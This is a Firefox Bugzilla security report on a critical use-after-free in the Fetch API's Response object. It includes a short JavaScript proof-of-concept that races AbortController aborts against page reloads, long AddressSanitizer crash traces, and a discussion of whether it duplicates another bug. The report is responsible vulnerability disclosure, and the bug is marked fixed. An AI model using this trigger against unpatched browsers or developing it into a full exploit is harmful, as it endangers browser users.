Closed Bug 1565526 Opened 5 years ago Closed 5 years ago

Fetch - Use After Free with Response

Categories: Core :: DOM: Networking
Type: defect
Version: 69 Branch
Priority: Not set
Severity: normal

Status: RESOLVED FIXED
Target Milestone: mozilla70
Tracking Status
firefox-esr60 --- unaffected
firefox-esr68 --- unaffected
firefox68 --- unaffected
firefox69 --- fixed
firefox70 --- fixed

People

(Reporter: loobenyang, Assigned: baku)

Details

(Keywords: csectype-uaf, sec-critical, Whiteboard: [fixed by bug 1567419][post-critsmash-triage])

Attachments

(2 files)

Attached file UAF_Response_PoC.js

Reproduction test case (full server code in attached file UAF_Response_PoC.js):

<script>
// One fetch whose cancellation is driven by an AbortController; the handler only touches res.body.
var abortCtl = new AbortController();
fetch("./nofile.html", {signal:abortCtl.signal}).then(function(res){res.body;}).catch(function(e){});
// Fire abort() every 5 ms so it races the arrival of the Response and the document teardown...
setInterval(function(){abortCtl.abort();}, 5);
// ...and reload after 100 ms so the race is retried on every page load.
setTimeout(function(){location.reload();},100);
</script>

Steps to reproduce:

  1. Run the server-side script UAF_Response_PoC.js with Node.js (node UAF_Response_PoC.js).

  2. Open http://localhost:12345 in a Firefox ASan build.

  3. ASan reports a use-after-free with Response:

    =================================================================
    ==6345==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e00005b820 at pc 0x7fc7760d88c1 bp 0x7fff942f8bf0 sp 0x7fff942f8be8
    READ of size 8 at 0x60e00005b820 thread T0 (Web Content)
    #0 0x7fc7760d88c0 in CanonicalizeXPCOMParticipant /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:848:8

Firefox version: 69.0a1 (2019-07-07) (64-bit)
OS: Ubuntu 18.04 LTS 64bit

Stack trace:

=================================================================
==6345==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e00005b820 at pc 0x7fc7760d88c1 bp 0x7fff942f8bf0 sp 0x7fff942f8be8
READ of size 8 at 0x60e00005b820 thread T0 (Web Content)
    #0 0x7fc7760d88c0 in CanonicalizeXPCOMParticipant /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:848:8
    #1 0x7fc7760d88c0 in CCGraphBuilder::NoteXPCOMChild(nsISupports*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2155
    #2 0x7fc77609ac34 in mozilla::CycleCollectedJSRuntime::TraverseGCThing(mozilla::CycleCollectedJSRuntime::TraverseSelect, JS::GCCellPtr, nsCycleCollectionTraversalCallback&) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:705:5
    #3 0x7fc77609a7a7 in mozilla::JSGCThingParticipant::TraverseNative(void*, nsCycleCollectionTraversalCallback&) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:363:12
    #4 0x7fc7760d628a in TraverseNativeAndJS /builds/worker/workspace/build/src/xpcom/base/nsCycleCollectionParticipant.h:126:19
    #5 0x7fc7760d628a in CCGraphBuilder::BuildGraph(js::SliceBudget&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2061
    #6 0x7fc7760dea84 in nsCycleCollector::MarkRoots(js::SliceBudget&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2672:33
    #7 0x7fc7760e599c in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3417:9
    #8 0x7fc7760e9834 in nsCycleCollector_collectSlice(js::SliceBudget&, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3962:21
    #9 0x7fc779b42be4 in nsJSContext::RunCycleCollectorSlice(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1479:3
    #10 0x7fc779b43a02 in ICCRunnerFired(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1530:3
    #11 0x7fc776260c50 in operator() /builds/worker/workspace/build/src/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/6.4.0/../../../../include/c++/6.4.0/functional:2127:14
    #12 0x7fc776260c50 in mozilla::IdleTaskRunner::Run() /builds/worker/workspace/build/src/xpcom/threads/IdleTaskRunner.cpp:58
    #13 0x7fc7762619cd in mozilla::TimedOut(nsITimer*, void*) /builds/worker/workspace/build/src/xpcom/threads/IdleTaskRunner.cpp:78:13
    #14 0x7fc77628d06b in nsTimerImpl::Fire(int) /builds/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:561:7
    #15 0x7fc77628c8e9 in nsTimerEvent::Run() /builds/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:260:11
    #16 0x7fc77626dd71 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #17 0x7fc77629fad0 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #18 0x7fc7762a5ee8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #19 0x7fc777372cda in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #20 0x7fc7772a1d22 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #21 0x7fc7772a1d22 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #22 0x7fc7772a1d22 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #23 0x7fc77e897ac9 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #24 0x7fc782524f4f in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #25 0x7fc7772a1d22 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #26 0x7fc7772a1d22 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #27 0x7fc7772a1d22 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #28 0x7fc7825247eb in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #29 0x5581a88a4802 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #30 0x5581a88a4802 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #31 0x7fc79622eb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #32 0x5581a87c5db8 in _start (/home/thecoder/FirefoxBuilds/firefox/firefox+0x40db8)

0x60e00005b820 is located 0 bytes inside of 160-byte region [0x60e00005b820,0x60e00005b8c0)
freed by thread T0 (Web Content) here:
    #0 0x5581a8871442 in free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7fc7760ddeb6 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2416:7
    #2 0x7fc7760dcb9e in nsCycleCollector::FreeSnowWhite(bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2609:3
    #3 0x7fc7760e6358 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3584:3
    #4 0x7fc7760e5940 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3413:9
    #5 0x7fc7760e9834 in nsCycleCollector_collectSlice(js::SliceBudget&, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3962:21
    #6 0x7fc779b42c81 in nsJSContext::RunCycleCollectorSlice(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1479:3
    #7 0x7fc779b479ac in CCRunnerFired(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1869:7
    #8 0x7fc776260c50 in operator() /builds/worker/workspace/build/src/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/6.4.0/../../../../include/c++/6.4.0/functional:2127:14
    #9 0x7fc776260c50 in mozilla::IdleTaskRunner::Run() /builds/worker/workspace/build/src/xpcom/threads/IdleTaskRunner.cpp:58
    #10 0x7fc77629fad0 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #11 0x7fc7762a5ee8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #12 0x7fc777372cda in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #13 0x7fc7772a1d22 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #14 0x7fc7772a1d22 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #15 0x7fc7772a1d22 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #16 0x7fc77e897ac9 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #17 0x7fc782524f4f in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #18 0x7fc7772a1d22 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #19 0x7fc7772a1d22 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #20 0x7fc7772a1d22 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #21 0x7fc7825247eb in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #22 0x5581a88a4802 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #23 0x5581a88a4802 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #24 0x7fc79622eb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

previously allocated by thread T0 (Web Content) here:
    #0 0x5581a88717c3 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x5581a88a647d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7fc77c966453 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7fc77c966453 in mozilla::dom::MainThreadFetchResolver::OnResponseAvailableInternal(mozilla::dom::InternalResponse*) /builds/worker/workspace/build/src/dom/fetch/Fetch.cpp:579
    #4 0x7fc77c97a0b5 in OnResponseAvailable /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FetchDriver.h:55:5
    #5 0x7fc77c97a0b5 in mozilla::dom::FetchDriver::BeginAndGetFilteredResponse(mozilla::dom::InternalResponse*, bool) /builds/worker/workspace/build/src/dom/fetch/FetchDriver.cpp:782
    #6 0x7fc77c971431 in mozilla::dom::FetchDriver::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/dom/fetch/FetchDriver.cpp:1048:15
    #7 0x7fc776eda30e in nsCORSListenerProxy::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/netwerk/protocol/http/nsCORSListenerProxy.cpp:480:20
    #8 0x7fc776e4c489 in mozilla::net::HttpChannelChild::DoOnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:683:20
    #9 0x7fc776e56bf2 in mozilla::net::HttpChannelChild::OnStartRequest(nsresult const&, mozilla::net::nsHttpResponseHead const&, bool const&, mozilla::net::nsHttpHeaderArray const&, mozilla::net::ParentLoadInfoForwarderArgs const&, bool const&, bool const&, bool const&, unsigned long const&, int const&, unsigned int const&, nsTString<char> const&, nsTString<char> const&, mozilla::net::NetAddr const&, mozilla::net::NetAddr const&, unsigned int const&, nsTString<char> const&, long const&, bool const&, bool const&, bool const&, mozilla::net::ResourceTimingStruct const&, bool const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:608:3
    #10 0x7fc776ef72c5 in mozilla::net::StartRequestEvent::Run() /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:427:13
    #11 0x7fc776d189a1 in mozilla::net::ChannelEventQueue::RunOrEnqueue(mozilla::net::ChannelEvent*, bool) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:210:10
    #12 0x7fc776e54fda in mozilla::net::HttpChannelChild::RecvOnStartRequest(nsresult const&, mozilla::net::nsHttpResponseHead const&, bool const&, mozilla::net::nsHttpHeaderArray const&, mozilla::net::ParentLoadInfoForwarderArgs const&, bool const&, bool const&, bool const&, unsigned long const&, int const&, unsigned int const&, nsTString<char> const&, nsTString<char> const&, mozilla::net::NetAddr const&, mozilla::net::NetAddr const&, short const&, unsigned int const&, nsTString<char> const&, long const&, bool const&, bool const&, bool const&, mozilla::net::ResourceTimingStruct const&, bool const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:489:12
    #13 0x7fc777740cdb in mozilla::net::PHttpChannelChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PHttpChannelChild.cpp:859:28
    #14 0x7fc777521e99 in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:7197:32
    #15 0x7fc77736b9c0 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2158:25
    #16 0x7fc777367e1d in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2082:9
    #17 0x7fc777369a6b in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1939:3
    #18 0x7fc777369fd7 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1970:13
    #19 0x7fc77626dd71 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #20 0x7fc77629fad0 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #21 0x7fc7762a5ee8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #22 0x7fc777372cda in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #23 0x7fc7772a1d22 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #24 0x7fc7772a1d22 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #25 0x7fc7772a1d22 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #26 0x7fc77e897ac9 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #27 0x7fc782524f4f in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #28 0x7fc7772a1d22 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #29 0x7fc7772a1d22 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #30 0x7fc7772a1d22 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #31 0x7fc7825247eb in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #32 0x5581a88a4802 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #33 0x5581a88a4802 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #34 0x7fc79622eb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:848:8 in CanonicalizeXPCOMParticipant
Shadow bytes around the buggy address:
  0x0c1c800036b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1c800036c0: fd fd fd fa fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c1c800036d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1c800036e0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1c800036f0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
=>0x0c1c80003700: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fd
  0x0c1c80003710: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c1c80003720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c80003730: 00 00 00 00 fa fa fa fa fa fa fa fa 00 00 00 00
  0x0c1c80003740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c80003750: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==6345==ABORTING

baku, dupe of bug 1564821?

Flags: needinfo?(amarchesini)

Correct.

Status: NEW → RESOLVED
Closed: 5 years ago
Flags: needinfo?(amarchesini)
Resolution: --- → DUPLICATE
Flags: sec-bounty?

Unfortunately Nils beat you to this one by a couple of days.

Group: core-security → dom-core-security
Flags: sec-bounty? → sec-bounty-

Actually they are different bugs.
In bug 1564821, the UAF object was allocated in

#3 0x7f5547ee35eb in mozilla::dom::Response::Clone(JSContext*, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/fetch/Response.cpp:417
#4 0x7f55456f9456 in mozilla::dom::Response_Binding::clone(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Response*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/ResponseBinding.cpp:1144:75

While with my PoC, the UAF object was allocated in

#3 0x7fc77c966453 in mozilla::dom::MainThreadFetchResolver::OnResponseAvailableInternal(mozilla::dom::InternalResponse*) /builds/worker/workspace/build/src/dom/fetch/Fetch.cpp:579
#4 0x7fc77c97a0b5 in OnResponseAvailable /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FetchDriver.h:55:5
#5 0x7fc77c97a0b5 in mozilla::dom::FetchDriver::BeginAndGetFilteredResponse(mozilla::dom::InternalResponse*, bool) /builds/worker/workspace/build/src/dom/fetch/FetchDriver.cpp:782

The fix for bug 1564821 was checked in two days ago ( https://bugzilla.mozilla.org/show_bug.cgi?id=1564821#c11 ), but I can still trigger this bug with the very same PoC in today's nightly ASan build.

Firefox version: 70.0a1 (2019-07-17) (64-bit)
OS: Ubuntu 18.04 LTS 64bit

=================================================================
==7796==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e0000836e0 at pc 0x7fe511e61221 bp 0x7ffdd9a259f0 sp 0x7ffdd9a259e8
READ of size 8 at 0x60e0000836e0 thread T0 (Web Content)
    #0 0x7fe511e61220 in CanonicalizeXPCOMParticipant /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:848:8
    #1 0x7fe511e61220 in CCGraphBuilder::NoteXPCOMChild(nsISupports*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2155
    #2 0x7fe511e235a4 in mozilla::CycleCollectedJSRuntime::TraverseGCThing(mozilla::CycleCollectedJSRuntime::TraverseSelect, JS::GCCellPtr, nsCycleCollectionTraversalCallback&) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:705:5
    #3 0x7fe511e23117 in mozilla::JSGCThingParticipant::TraverseNative(void*, nsCycleCollectionTraversalCallback&) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:363:12
    #4 0x7fe511e5ebea in TraverseNativeAndJS /builds/worker/workspace/build/src/xpcom/base/nsCycleCollectionParticipant.h:126:19
    #5 0x7fe511e5ebea in CCGraphBuilder::BuildGraph(js::SliceBudget&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2061
    #6 0x7fe511e673e4 in nsCycleCollector::MarkRoots(js::SliceBudget&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2672:33
    #7 0x7fe511e6e2fc in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3417:9
    #8 0x7fe511e72194 in nsCycleCollector_collectSlice(js::SliceBudget&, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3962:21
    #9 0x7fe515922cc4 in nsJSContext::RunCycleCollectorSlice(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1479:3
    #10 0x7fe515923ae2 in ICCRunnerFired(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1530:3
    #11 0x7fe511fe9560 in operator() /builds/worker/workspace/build/src/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/6.4.0/../../../../include/c++/6.4.0/functional:2127:14
    #12 0x7fe511fe9560 in mozilla::IdleTaskRunner::Run() /builds/worker/workspace/build/src/xpcom/threads/IdleTaskRunner.cpp:58
    #13 0x7fe511fea2dd in mozilla::TimedOut(nsITimer*, void*) /builds/worker/workspace/build/src/xpcom/threads/IdleTaskRunner.cpp:78:13
    #14 0x7fe5120159cb in nsTimerImpl::Fire(int) /builds/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:561:7
    #15 0x7fe512015249 in nsTimerEvent::Run() /builds/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:260:11
    #16 0x7fe511ff66d1 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #17 0x7fe512028430 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #18 0x7fe51202e848 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #19 0x7fe5131105fa in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #20 0x7fe513032e62 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #21 0x7fe513032e62 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #22 0x7fe513032e62 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #23 0x7fe51a686b69 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #24 0x7fe51e331aff in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #25 0x7fe513032e62 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #26 0x7fe513032e62 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #27 0x7fe513032e62 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #28 0x7fe51e33139b in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #29 0x5587bbf51802 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #30 0x5587bbf51802 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #31 0x7fe5320beb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #32 0x5587bbe72db8 in _start (/home/thecoder/FirefoxBuilds/firefox/firefox+0x40db8)

0x60e0000836e0 is located 0 bytes inside of 160-byte region [0x60e0000836e0,0x60e000083780)
freed by thread T0 (Web Content) here:
    #0 0x5587bbf1e442 in free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7fe511e87e52 in MaybeKillObject /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2429:29
    #2 0x7fe511e87e52 in SnowWhiteKiller::Visit(nsPurpleBuffer&, nsPurpleBufferEntry*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2459
    #3 0x7fe511e65aa2 in void nsPurpleBuffer::VisitEntries<SnowWhiteKiller>(SnowWhiteKiller&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:941:23
    #4 0x7fe511e66ce9 in nsCycleCollector::FreeSnowWhiteWithBudget(js::SliceBudget&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2624:14
    #5 0x7fe513be22d8 in AsyncFreeSnowWhite::Run() /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSRuntime.cpp:146:9
    #6 0x7fe512041dea in IdleRunnableWrapper::Run() /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:331:22
    #7 0x7fe512028430 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #8 0x7fe51202e848 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #9 0x7fe5131105fa in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #10 0x7fe513032e62 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #11 0x7fe513032e62 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #12 0x7fe513032e62 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #13 0x7fe51a686b69 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #14 0x7fe51e331aff in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #15 0x7fe513032e62 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #16 0x7fe513032e62 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #17 0x7fe513032e62 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #18 0x7fe51e33139b in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #19 0x5587bbf51802 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #20 0x5587bbf51802 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #21 0x7fe5320beb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

previously allocated by thread T0 (Web Content) here:
    #0 0x5587bbf1e7c3 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x5587bbf5347d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7fe51874c033 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7fe51874c033 in mozilla::dom::MainThreadFetchResolver::OnResponseAvailableInternal(mozilla::dom::InternalResponse*) /builds/worker/workspace/build/src/dom/fetch/Fetch.cpp:579
    #4 0x7fe51875fc13 in OnResponseAvailable /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FetchDriver.h:55:5
    #5 0x7fe51875fc13 in mozilla::dom::FetchDriver::BeginAndGetFilteredResponse(mozilla::dom::InternalResponse*, bool) /builds/worker/workspace/build/src/dom/fetch/FetchDriver.cpp:782
